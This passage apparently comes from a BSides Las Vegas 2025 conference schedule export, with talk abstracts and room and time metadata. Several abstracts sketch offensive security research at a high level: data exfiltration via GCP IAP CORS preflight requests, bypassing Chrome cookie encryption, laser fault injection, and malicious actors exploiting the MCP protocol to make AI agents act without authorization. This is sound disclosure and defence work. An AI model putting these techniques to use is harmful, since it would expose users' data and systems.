The highlight of the session is a new research technique we&#x27;ve developed: exploiting IAP&#x27;s CORS behavior to exfiltrate sensitive data using preflight OPTIONS requests, effectively bypassing traditional network egress controls. This method can succeed even in highly restricted environments with no internet access, no public IPs, and VPC Service Controls fully enforced. The issue has been responsibly disclosed to Google and is currently under review, with an expected review timeline of 30 days.

We’re sharing this research to highlight just how fragile IAP configurations can be, where even a minor misstep or overlooked setting can unintentionally expose internal resources to the internet. Alongside the technique, we’ll provide practical detection strategies to help defenders identify this specific attack vector through GCP’s logging infrastructure.

We’ll wrap up by walking through practical detection strategies using GCP’s audit and access logs, showing how to identify abuse patterns, correlate signals across services, and improve visibility into how IAP is being used (or misused). These techniques are designed to help defenders surface subtle signs of exploitation and build more resilient monitoring around one of GCP’s most sensitive access gateways.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TDYSX8/</url>
            <location>Florentine A</location>
            
            <attendee>Ariel Kalman</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9FF3LX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9FF3LX</pentabarf:event-slug>
            <pentabarf:title>Vulnerabilities Beyond CVEs: Cyber Resilience and the Next Financial Crisis</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T113000</dtstart>
            <dtend>20250805T121500</dtend>
            <duration>004500</duration>
            <summary>Vulnerabilities Beyond CVEs: Cyber Resilience and the Next Financial Crisis</summary>
            <description>Cyber threats have evolved into a credible risk to global financial stability. This talk explores fundamental vulnerabilities that are always present in our IT and information security systems, making those systems susceptible to disruptions that could spark future financial crises. These vulnerabilities amplify the risk that CVEs pose. The vulnerabilities give rise to IT systems that are complex, deeply interconnected, and leveraged, yet assumed to be resilient—until a cyberattack proves otherwise by disrupting critical business operations. Drawing on real-world examples and recent research, the talk illustrates the presence of those vulnerabilities in IT systems and how those same vulnerabilities are also always present in the financial system, making it susceptible to financial crises. The talk closes with a description of similar steps that can build resilience in the financial system as well as in IT and information security systems.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9FF3LX/</url>
            <location>Florentine A</location>
            
            <attendee>Stacey Schreft</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DCPYU7@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DCPYU7</pentabarf:event-slug>
            <pentabarf:title>What Should CVE Be When It Grows Up?</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T130000</dtstart>
            <dtend>20250805T134500</dtend>
            <duration>004500</duration>
            <summary>What Should CVE Be When It Grows Up?</summary>
            <description>A 45-minute moderated discussion featuring Bob Lord.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DCPYU7/</url>
            <location>Florentine A</location>
            
            <attendee>Jerry Gamblin</attendee>
            
            <attendee>Madison Ficorilli</attendee>
            
            <attendee>Bob Lord</attendee>
            
            <attendee>Tod Beardsley</attendee>
            
            <attendee>Chris Butera</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HEYP9S@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HEYP9S</pentabarf:event-slug>
            <pentabarf:title>Stealing Browser Cookies: Bypassing the newest Chrome security measures</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T144500</dtend>
            <duration>004500</duration>
            <summary>Stealing Browser Cookies: Bypassing the newest Chrome security measures</summary>
            <description>This session explores advanced security mechanisms implemented by major browsers to prevent cookie theft from their storage databases. Chrome has recently implemented AppBound encryption, which provides multi-layered protection for session cookies:

1) A 2-way DPAPI encryption system that operates with both elevated NT AUTHORITY\SYSTEM permissions and normal user-level decryption capabilities;

2) A state-key encryption layer utilizing the ChaCha20Poly1305 algorithm with custom keys (that once was AES-256-GCM encrypted);

These implementations have significantly reduced the effectiveness of info-stealing malware. However, this session will demonstrate potential vulnerabilities in these security measures and explain how to obtain decrypted cookies despite these protections. We will examine the new format specifications and encryption methodologies for cookies.

Beyond Chromium-based browsers, we&#x27;ll explore Gecko&#x27;s encryption algorithms, which involve structured ASN.1 data formats with multiple encryption schemes including 3DES and AES-256. We&#x27;ll also analyze Chromium on macOS which relies on PBKDF2 key derivation, and WebKit-based browsers that store cookies in binary cookie files.

Additionally, we&#x27;ll discuss Chrome&#x27;s forthcoming &quot;Device Bound Session Cookies&quot; (DBSC) technology, which aims to further mitigate session hijacking through cookie theft by implementing TPM chip-based encryption and requiring proof of possession of the cryptographic key.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HEYP9S/</url>
            <location>Florentine A</location>
            
            <attendee>Rafael Felix</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>YSW7SD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-YSW7SD</pentabarf:event-slug>
            <pentabarf:title>The Protocol Behind the Curtain: What MCP Really Exposes</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T154500</dtend>
            <duration>004500</duration>
            <summary>The Protocol Behind the Curtain: What MCP Really Exposes</summary>
            <description>This presentation aims to shed light on the overlooked security challenges posed by MCP. Drawing from recent analyses and vulnerabilities, we will explore how the protocol&#x27;s design choices, while facilitating integration, inadvertently open doors to exploitation.

Key points include:

Understanding MCP&#x27;s Architecture: A breakdown of how MCP connects AI agents to external tools and the trust assumptions involved.

Exploiting Trust: Demonstrations of how malicious actors can leverage MCP&#x27;s features to execute unauthorized actions.

Mitigation Strategies: Discussion of proposed frameworks and best practices to secure MCP implementations, including the Agent Security Framework and MCP Guardian.

Attendees will leave with actionable insights into securing their AI integrations and a deeper appreciation for the importance of protocol-level security considerations.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/YSW7SD/</url>
            <location>Florentine A</location>
            
            <attendee>Srajan Gupta</attendee>
            
            <attendee>Vinay Kumar</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>KA7TAR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-KA7TAR</pentabarf:event-slug>
            <pentabarf:title>Inside the Open-Source Kill Chain: How LLMs Helped Catch Lazarus and Stop a Crypto Backdoor</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T174500</dtend>
            <duration>004500</duration>
            <summary>Inside the Open-Source Kill Chain: How LLMs Helped Catch Lazarus and Stop a Crypto Backdoor</summary>
            <description>This talk presents findings from a multi-year research project that applied Large Language Models (LLMs) to real-world threat detection in the open-source software ecosystem. Rather than theorizing about AI’s future role in security, this work focuses on practical applications—showing how LLMs can be deployed today to detect vulnerabilities and malware that bypass traditional scanners, rulesets, and threat feeds.

The project centered around two key threat surfaces:
- Silently patched vulnerabilities in popular open-source libraries
- Malware published to package registries such as NPM and PyPI

**LLM Pipeline: Silent Patch Detection**
The first LLM pipeline was designed to analyze changelogs across thousands of open-source projects to identify likely security patches that were fixed but never disclosed (a practice often referred to as &quot;silent patching&quot;). This pipeline involved two stages:

LLM 1: Changelog Standardization and Parsing
- Changelogs vary wildly in structure, format, and tone—often written in markdown, HTML, or plaintext, hosted in GitHub, docs sites, or even PDFs. We used an LLM to extract, standardize, and structure this unbounded data into a consistent schema. This model also flagged ambiguous or security-relevant language (e.g., “stability fix”, “edge case resolved”) that would be easily overlooked by regex or keyword rules.

LLM 2: Patch Classification
- The parsed changelog entries were then passed to a second model trained to classify whether a given commit or entry was likely to contain a security fix, even if no security keywords were used. The model was tuned to be sensitive to euphemistic phrasing and changelog norms. High-confidence results were sent to human reviewers who reverse-engineered the patch to confirm and rate severity.

Findings:
This system uncovered over 900 silently patched vulnerabilities, many in major packages like Axios, Apache ECharts, and Chainlit.
- 67% never obtained a CVE and were never published in any vulnerability database
- 25% were rated high or critical severity
- Examples included a critical path traversal bug, stored XSS, and a prototype pollution issue exploitable via browser inputs.
- These vulnerabilities would have gone completely undetected by CVE-based tools

**LLM Pipeline: Malware Detection in Registries**
The second LLM-based detection pipeline was used to scan all newly published and updated packages on public registries, primarily NPM and PyPI.

LLM 1: Metadata Anomaly Detection
- This model ingested human-written data such as README files, descriptions, contributor metadata, and author behavior. It was trained to identify inconsistencies, abnormal phrasing, typosquatting patterns, and red flags in descriptions (e.g., toolsets pretending to be SDKs with unrelated language or package names mimicking popular libraries with low-quality documentation).

LLM 2: Orchestration and Triage
- The second LLM acted as an orchestrator of static scanning tools. We capture over 30 weighted indicators by running various static scans on the code. The LLM then uses these indicators and indicators from the previous model to decide whether to mark the package immediately as malware or escalate the package to a human researcher. 

Findings:
- Over 600 malicious packages were discovered in a single month (March 2025).
- Detection time averaged 5 minutes post-publish, compared to 10+ days for OpenSSF.

Most common techniques included:
- Encoded payloads decoded at runtime
- Time-delayed execution using setTimeout()
- Clipboard hijackers and credential stealers
- Obfuscated C2 infrastructure, often hidden in build scripts

**Notable Case Studies**
Lazarus Group NPM Campaign
- The pipeline flagged a malicious package (react-html2pdf.js) uploaded to NPM containing obfuscated code and an embedded C2 call. We observed the attacker—later attributed to Lazarus Group—re-uploading new variants every 10 minutes, likely debugging live. We reported the campaign before a functional version was deployed.

Ripple SDK Backdoor
- A malicious version of the official Ripple SDK (@xrplf/xrpl) was published using a compromised maintainer token. It included a Node.js-only backdoor that connected to an external C2 server and stole private crypto keys. Detection occurred within minutes, and coordination with Ripple and NPM teams prevented what could have had a catastrophic impact on the crypto community.

Rand-User-Agent RAT Supply Chain Campaign
- In this campaign, a popular NPM package was compromised via a dev token and a Remote Access Trojan (RAT) was injected into the project. The malware sent outbound C2 traffic using a randomized User-Agent string to evade common detection heuristics and proxy logs. It also used system profiling logic to avoid execution in CI/CD environments. This was not detected by any other databases even 10 days after the malicious contribution.

This talk provides a deep technical look into how LLMs can assist in detecting real threats. It also focuses on how this research can be replicated using currently available frontier out-of-the-box models like GPT-4.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/KA7TAR/</url>
            <location>Florentine A</location>
            
            <attendee>Mackenzie Jackson</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>FXLWKJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-FXLWKJ</pentabarf:event-slug>
            <pentabarf:title>Laser Beams &amp; Light Streams: Letting Hackers Go Pew Pew, Building Affordable Light-Based Hardware Security Tooling</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T180000</dtstart>
            <dtend>20250805T184500</dtend>
            <duration>004500</duration>
            <summary>Laser Beams &amp; Light Streams: Letting Hackers Go Pew Pew, Building Affordable Light-Based Hardware Security Tooling</summary>
            <description>Stored memory in hardware has had a long history of being influenced by light, by design. For instance, as memory is represented by the series of transistors, and their physical state represents 1&#x27;s and 0&#x27;s, original EEPROM memory could be erased via the utilization of UV light, in preparation for flashing new memory.

Naturally, whilst useful, this has also proven to be an avenue of opportunity for attackers, allowing them to selectively influence memory via a host of optical/light-based techniques. As chips became more advanced, opaque resin was used as a &quot;temporary&quot; measure to combat this flaw, coating chips in a material that would reflect undesirable UV.

The present-day opinion is that laser (or light) based hardware attacks are something that only nation-state actors are capable of, due to both the cost of tooling and the personnel expertise required. Currently, sophisticated hardware labs use expensive, high frequency IR beams to penetrate the resin.

This project demonstrates that with a limited budget and a hacker-and-maker mentality, similar results can be obtained at a fraction of the cost, from the comfort of your home or garage. With modifications to an open-source low-cost microscope and the addition of a home-built beam splitter and interchangeable diode laser, it has been shown that consumer-grade diodes are capable of producing results similar to the high-cost variants, such as the YAG lasers.

One example of results includes introducing affordable avenues to conduct laser-based fault injection, via the usage of such budget-friendly tooling. We are opening the study of these low-level hardware attacking methodologies to more entry-level security testers, without the need for hundreds of thousands of dollars in startup capital.

By leveraging more inexpensive technology alternatives, we have embarked on a mission to unveil hardware malware, detect supply chain chip replacements, and delve into the realm of laser logic state imaging. Our approach integrates optics, laser selection, and machine learning components.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/FXLWKJ/</url>
            <location>Florentine A</location>
            
            <attendee>Larry Trowell</attendee>
            
            <attendee>Sam &quot;PANTH13R&quot; Beaumont</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JPPBAZ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JPPBAZ</pentabarf:event-slug>
            <pentabarf:title>Interview Like a Legend: No Slides, Just Vibes</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T104500</dtend>
            <duration>004500</duration>
            <summary>Interview Like a Legend: No Slides, Just Vibes</summary>
            <description>Resumes are fine. But they don’t get you hired - you do.
In this fast-paced, no-fluff talk, cybersecurity hiring manager and mohawked chaos gremlin John Stoner breaks down how to stop bombing interviews and start showing up like the badass candidate you are.
With 25+ years in national security and cybersecurity - and hundreds of interviews under his belt - John will walk you through what actually works in an interview setting, based on real-world hiring across federal and commercial roles.
We’ll cover:
•	Why resumes don’t matter as much as you think
•	How preparation (not memorization) makes you stand out
•	What stories to rehearse—including your two-minute “tell me about yourself”
•	How to answer both technical and non-technical questions without sounding like a robot
•	What questions you should ask—and why you&#x27;re interviewing them, too
No slides, just memes, tough love, and the kind of advice you wish someone had given you sooner.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JPPBAZ/</url>
            <location>Florentine B</location>
            
            <attendee>John Stoner</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>R3CW7R@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-R3CW7R</pentabarf:event-slug>
            <pentabarf:title>Hire Ground Resume Reviews, Tuesday Lunch Break</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T130000</dtstart>
            <dtend></dtend>
            <duration>010000</duration>
            <summary>Hire Ground Resume Reviews, Tuesday Lunch Break</summary>
            <description>Hire Ground Resume Reviews, Tuesday Lunch Break</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/R3CW7R/</url>
            <location>Florentine B</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>KVJZHT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-KVJZHT</pentabarf:event-slug>
            <pentabarf:title>Beyond the Command Line: Transitioning from Individual Contributor to Leader</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T130000</dtstart>
            <dtend></dtend>
            <duration>004500</duration>
            <summary>Beyond the Command Line: Transitioning from Individual Contributor to Leader</summary>
            <description>The cybersecurity industry is at a crossroads. While technical expertise remains crucial, organizations increasingly need strong leadership to guide teams, manage complexity, and drive security initiatives forward. However, transitioning from an individual contributor to a leadership role is one of the most difficult career shifts in cybersecurity. Many professionals who excel in technical roles find themselves promoted into management without the necessary training or guidance, leading to frustration, burnout, and ineffective leadership. 

I believe this talk is a good fit for the Hire Ground track because it directly addresses a widespread and often overlooked challenge in cybersecurity careers: the leadership gap. Technical skills alone do not prepare professionals to manage people, handle conflict, delegate work, or communicate effectively with executives. Without the right support and education, new leaders struggle to balance their technical expertise with the soft skills required for management. The result? Teams suffer, projects falter, and promising cybersecurity professionals leave leadership roles prematurely, contributing to industry-wide retention challenges.  

The key to addressing the leadership gap in cybersecurity is deliberate preparation, skill development, and structured mentorship—not just learning on the job through trial and error. This discussion will provide a real-world roadmap for technical professionals stepping into leadership roles, equipping them with practical strategies to lead effectively while maintaining credibility and confidence. 

1. Mindset Shift: Attendees will learn how to redefine success in leadership—moving from personal technical achievements to enabling and empowering their teams. 

1. Essential Leadership Skills: The session will cover communication, delegation, decision-making, and conflict resolution, ensuring new leaders are prepared for the human-side of cybersecurity leadership. 

1. Navigating Common Challenges: Managing former peers, avoiding micromanagement, handling imposter syndrome, and balancing hands-on work with strategic leadership will be key focus areas. 

1. Building a Leadership Style: Attendees will explore different leadership approaches, helping them develop an authentic leadership identity that plays to their strengths. 

1. Long-Term Growth &amp; Retention: The discussion will emphasize mentorship, professional development, and continuous learning, ensuring new leaders don’t just survive in their roles—but thrive while fostering stronger teams and a healthier cybersecurity industry. 

I feel that by leading this structured discussion, I can help empower attendees with actionable insights to confidently step into leadership roles, strengthening both their individual careers and the broader cybersecurity ecosystem.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/KVJZHT/</url>
            <location>Florentine B</location>
            
            <attendee>Leo Pate</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>E39UKP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-E39UKP</pentabarf:event-slug>
            <pentabarf:title>Your Interview Game is Weak: Gamifying Technical Interviews through Role-Playing</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T144500</dtend>
            <duration>004500</duration>
            <summary>Your Interview Game is Weak: Gamifying Technical Interviews through Role-Playing</summary>
            <description>As the ways of working have changed to include hybrid and remote arrangements on a more regular basis, the interview process has not kept pace. No longer are candidates sitting in a conference room being asked to do technical challenges in person. Instead, they are interviewing virtually, where assessing IQ and EQ (emotional intelligence) can be even more difficult. Yet in this distributed environment, EQ skills such as meeting engagement and communication are crucial to success, and the expectations of these abilities have increased. According to the 2025 CareerPlug Candidate Experience Report, “26% of candidates declined an offer due to a poor experience.” Additionally, the report found that “91% of candidates said a positive candidate experience influenced their decision to accept an offer.” No longer is the outdated stereotype of a software engineer who hides behind a computer a viable option. Instead, people must now possess both technical skills and the ability to communicate clearly with other teams, presenting their areas of discipline coherently and regularly.

By creating a fictitious organization and characters specifically crafted to interact with the interviewee, cross-team dynamics and organizational challenges can be effectively incorporated, enriching the experience for all involved. The central component of this is the Non-Playing Interviewers or NPIs. Each NPI is specifically crafted to come with a backstory, notifications, and alignments. In other words, the NPI will react based on responses from the interviewee and will be more or less inclined to take one approach or another based on how other NPIs are reacting.

The interview itself consists of challenges, all of which represent actual tasks expected of the role. These challenges are intentionally designed to allow for dynamic gameplay, depending on the approach the interviewee takes. For example, while an interviewee with heavy AWS experience might respond in one way, an interviewee with a greater focus on software development might respond in a completely different way, and the challenges are fluid enough to provide each interviewee a rich environment in which to navigate.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/E39UKP/</url>
            <location>Florentine B</location>
            
            <attendee>Matt Torbin</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8DZ7DR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8DZ7DR</pentabarf:event-slug>
            <pentabarf:title>Root To CISO or not?</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T154500</dtend>
            <duration>004500</duration>
            <summary>Root To CISO or not?</summary>
            <description>“Root to CISO or Not”

Not everyone dreams of becoming a CISO—some of us are just trying to avoid pager fatigue… and federal indictments. Join us for a fun and insightful panel featuring two experienced CISOs and a cybersecurity recruiter as they explore the many career paths in cybersecurity, from hands-on technical roles to leadership positions.

This session will highlight how professionals can grow within the field, pivot between specialties, and decide whether the CISO track is the right fit—or if life might be better without the liability insurance. You’ll hear real-world career lessons, practical guidance, and a few laughs about the highs, lows, and unexpected twists of navigating a cybersecurity career.

Whether you’re aiming for the big chair or just trying to figure out your next move, this panel will offer clarity, encouragement, and the kind of candid advice you won’t get from a job description.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8DZ7DR/</url>
            <location>Florentine B</location>
            
            <attendee>Ray Espinoza</attendee>
            
            <attendee>Kris Rides</attendee>
            
            <attendee>Jake Bernardes</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>UYXVAU@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-UYXVAU</pentabarf:event-slug>
            <pentabarf:title>The World Famous Hire Ground Panel, Tuesday Edition</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend>20250805T162500</dtend>
            <duration>002500</duration>
            <summary>The World Famous Hire Ground Panel, Tuesday Edition</summary>
            <description>The World Famous Hire Ground Panel, Tuesday Edition</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/UYXVAU/</url>
            <location>Florentine B</location>
            
            <attendee>Kirsten Sireci Renner</attendee>
            
            <attendee>Kris Rides</attendee>
            
            <attendee>Heather Morris</attendee>
            
            <attendee>Noelle Hori</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HNE73Q@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HNE73Q</pentabarf:event-slug>
            <pentabarf:title>Hire Ground Resume Reviews, Tuesday Evening</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend>20250805T165000</dtend>
            <duration>005000</duration>
            <summary>Hire Ground Resume Reviews, Tuesday Evening</summary>
            <description>Free resume reviews in Hire Ground.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HNE73Q/</url>
            <location>Florentine B</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JZQS7X@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JZQS7X</pentabarf:event-slug>
            <pentabarf:title>Hire Ground Mixer, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T185000</dtend>
            <duration>015000</duration>
            <summary>Hire Ground Mixer, Tuesday</summary>
            <description>Hire Ground Mixer, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JZQS7X/</url>
            <location>Florentine B</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>3HTVUE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-3HTVUE</pentabarf:event-slug>
            <pentabarf:title>Silent Auction Opens, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T083000</dtstart>
            <dtend>20250805T083000</dtend>
            <duration>000000</duration>
            <summary>Silent Auction Opens, Tuesday</summary>
            <description>Silent Auction Opens</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/3HTVUE/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>G3YLV8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-G3YLV8</pentabarf:event-slug>
            <pentabarf:title>Middle Ground Opens, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T083000</dtstart>
            <dtend>20250805T083000</dtend>
            <duration>000000</duration>
            <summary>Middle Ground Opens, Tuesday</summary>
            <description>Middle Ground Opens, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/G3YLV8/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8C8L37@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8C8L37</pentabarf:event-slug>
            <pentabarf:title>PvJ CTF Play Begins, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T090000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>PvJ CTF Play Begins, Tuesday</summary>
            <description>PvJ CTF Play Begins, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8C8L37/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>FYECDX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-FYECDX</pentabarf:event-slug>
            <pentabarf:title>Morning Talks, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend></dtend>
            <duration>013000</duration>
            <summary>Morning Talks, Tuesday</summary>
            <description>Morning Talks, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/FYECDX/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>GXWDKT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-GXWDKT</pentabarf:event-slug>
            <pentabarf:title>Lunch Break, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T123000</dtstart>
            <dtend>20250805T140000</dtend>
            <duration>013000</duration>
            <summary>Lunch Break, Tuesday</summary>
            <description>Lunch, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/GXWDKT/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>UC7LUT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-UC7LUT</pentabarf:event-slug>
            <pentabarf:title>Afternoon Talks, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend></dtend>
            <duration>020000</duration>
            <summary>Afternoon Talks, Tuesday</summary>
            <description>Afternoon Talks, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
